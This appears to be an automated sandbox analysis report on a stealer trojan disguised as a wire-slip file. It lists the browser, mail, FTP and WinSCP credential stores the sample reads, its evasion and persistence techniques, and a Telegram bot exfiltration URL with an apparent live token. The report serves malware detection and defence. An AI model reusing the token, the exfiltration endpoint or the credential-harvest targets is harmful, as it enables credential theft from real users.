                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Users\user\Desktop\Wire slip account payable.pif.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeQueries volume information: C:\Users\user\AppData\Roaming\EQVRGq.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeQueries volume information: C:\Users\user\AppData\Roaming\EQVRGq.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3e03808.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.4160006353.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Wire slip account payable.pif.exe PID: 1596, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Wire slip account payable.pif.exe PID: 7432, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EQVRGq.exe PID: 7856, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3e03808.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.4160006353.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4160419994.0000000002C67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Wire slip account payable.pif.exe PID: 1596, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Wire slip account payable.pif.exe PID: 7432, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EQVRGq.exe PID: 7856, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeFile opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\Wire slip account payable.pif.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\EQVRGq.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3e03808.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Wire slip account payable.pif.exe PID: 1596, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Wire slip account payable.pif.exe PID: 7432, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EQVRGq.exe PID: 7856, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3e03808.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.4160006353.00000000030BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Wire slip account payable.pif.exe PID: 1596, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Wire slip account payable.pif.exe PID: 7432, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EQVRGq.exe PID: 7856, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3e03808.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3e03808.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Wire slip account payable.pif.exe.3dc59e8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000E.00000002.4160006353.00000000030E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4160419994.0000000002C67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Wire slip account payable.pif.exe PID: 1596, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Wire slip account payable.pif.exe PID: 7432, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: EQVRGq.exe PID: 7856, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Web Service
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      111
                      Process Injection
                      1
                      Deobfuscate/Decode Files or Information
                      1
                      Input Capture
                      34
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      1
                      Ingress Tool Transfer
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job
                      3
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      1
                      Query Registry
                      SMB/Windows Admin Shares1
                      Email Collection
                      11
                      Encrypted Channel
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                      Software Packing
                      NTDS631
                      Security Software Discovery
                      Distributed Component Object Model1
                      Input Capture
                      3
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading
                      LSA Secrets1
                      Process Discovery
                      SSHKeylogging4
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Masquerading
                      Cached Domain Credentials261
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items261
                      Virtualization/Sandbox Evasion
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                      Process Injection
                      Proc Filesystem1
                      System Network Configuration Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560051 Sample: Wire slip account payable.pif.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 48 api.telegram.org 2->48 50 ip-api.com 2->50 56 Suricata IDS alerts for network traffic 2->56 58 Found malware configuration 2->58 60 Malicious sample detected (through community Yara rule) 2->60 64 17 other signatures 2->64 8 Wire slip account payable.pif.exe 7 2->8         started        12 EQVRGq.exe 5 2->12         started        signatures3 62 Uses the Telegram API (likely for C&C communication) 48->62 process4 file5 40 C:\Users\user\AppData\RoamingQVRGq.exe, PE32 8->40 dropped 42 C:\Users\user\...QVRGq.exe:Zone.Identifier, ASCII 8->42 dropped 44 C:\Users\user\AppData\Local\...\tmp14C9.tmp, XML 8->44 dropped 46 C:\...\Wire slip account payable.pif.exe.log, ASCII 8->46 dropped 66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->66 68 Adds a directory exclusion to Windows Defender 8->68 70 Injects a PE file into a foreign processes 8->70 14 Wire slip account payable.pif.exe 15 2 8->14         started        18 powershell.exe 23 8->18         started        20 powershell.exe 23 8->20         started        22 schtasks.exe 1 8->22         started        72 Multi AV Scanner detection for dropped file 12->72 74 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 12->74 76 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->76 78 Machine Learning detection for dropped file 12->78 24 EQVRGq.exe 12->24         started        26 schtasks.exe 12->26         started        28 EQVRGq.exe 12->28         started        signatures6 process7 dnsIp8 52 ip-api.com 208.95.112.1, 49735, 49739, 80 TUT-ASUS United States 14->52 54 api.telegram.org 149.154.167.220, 443, 49737, 49740 TELEGRAMRU United Kingdom 14->54 80 Loading BitLocker PowerShell Module 18->80 30 conhost.exe 18->30         started        32 WmiPrvSE.exe 18->32         started        34 conhost.exe 20->34         started        36 conhost.exe 22->36         started        82 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 24->82 84 Tries to steal Mail credentials (via file / registry access) 24->84 86 Tries to harvest and steal ftp login credentials 24->86 88 Tries to harvest and steal browser information (history, passwords, etc) 24->88 38 conhost.exe 26->38         started        signatures9 process10

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Wire slip account payable.pif.exe63%ReversingLabsByteCode-MSIL.Trojan.Taskun
                      Wire slip account payable.pif.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\EQVRGq.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\EQVRGq.exe63%ReversingLabsByteCode-MSIL.Trojan.Taskun
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      ip-api.com
                      208.95.112.1
                      truefalse
                        high
                        api.telegram.org
                        149.154.167.220
                        truefalse
                          high
                          NameMaliciousAntivirus DetectionReputation
                          https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/sendDocumentfalse
                            high
                            http://ip-api.com/line/?fields=hostingfalse
                              high
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://www.apache.org/licenses/LICENSE-2.0Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.comWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designersGWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.fontbureau.com/designers/?Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.founder.com.cn/cn/bTheWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://account.dyn.com/Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmpfalse
                                          high
                                          https://api.telegram.orgWire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002D0E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.000000000318E000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.00000000030C5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.fontbureau.com/designers?Wire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.tiro.comWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.fontbureau.com/designersWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.telegram.org/bot7180778750:AAGcpZL53RI1C6DEr2Yp4lM3UKxKArXTZ4I/Wire slip account payable.pif.exe, 00000000.00000002.1740228748.0000000003D39000.00000004.00000800.00020000.00000000.sdmp, Wire slip account payable.pif.exe, 00000008.00000002.4160419994.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4160006353.0000000003061000.00000004.00000800.00020000.00000000.sdmp, EQVRGq.exe, 0000000E.00000002.4156921024.0000000000433000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.goodfont.co.krWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.chiark.greenend.org.uk/~sgtatham/putty/0Wire slip account payable.pif.exe, EQVRGq.exe.0.drfalse
                                                        high
                                                        http://www.carterandcone.comlWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.sajatypeworks.comWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.typography.netDWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.fontbureau.com/designers/cabarga.htmlNWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.founder.com.cn/cn/cTheWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.galapagosdesign.com/staff/dennis.htmWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.founder.com.cn/cnWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.fontbureau.com/designers/frere-user.htmlWire slip account payable.pif.exe, 00000000.00000002.1744320440.0000000006F42000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
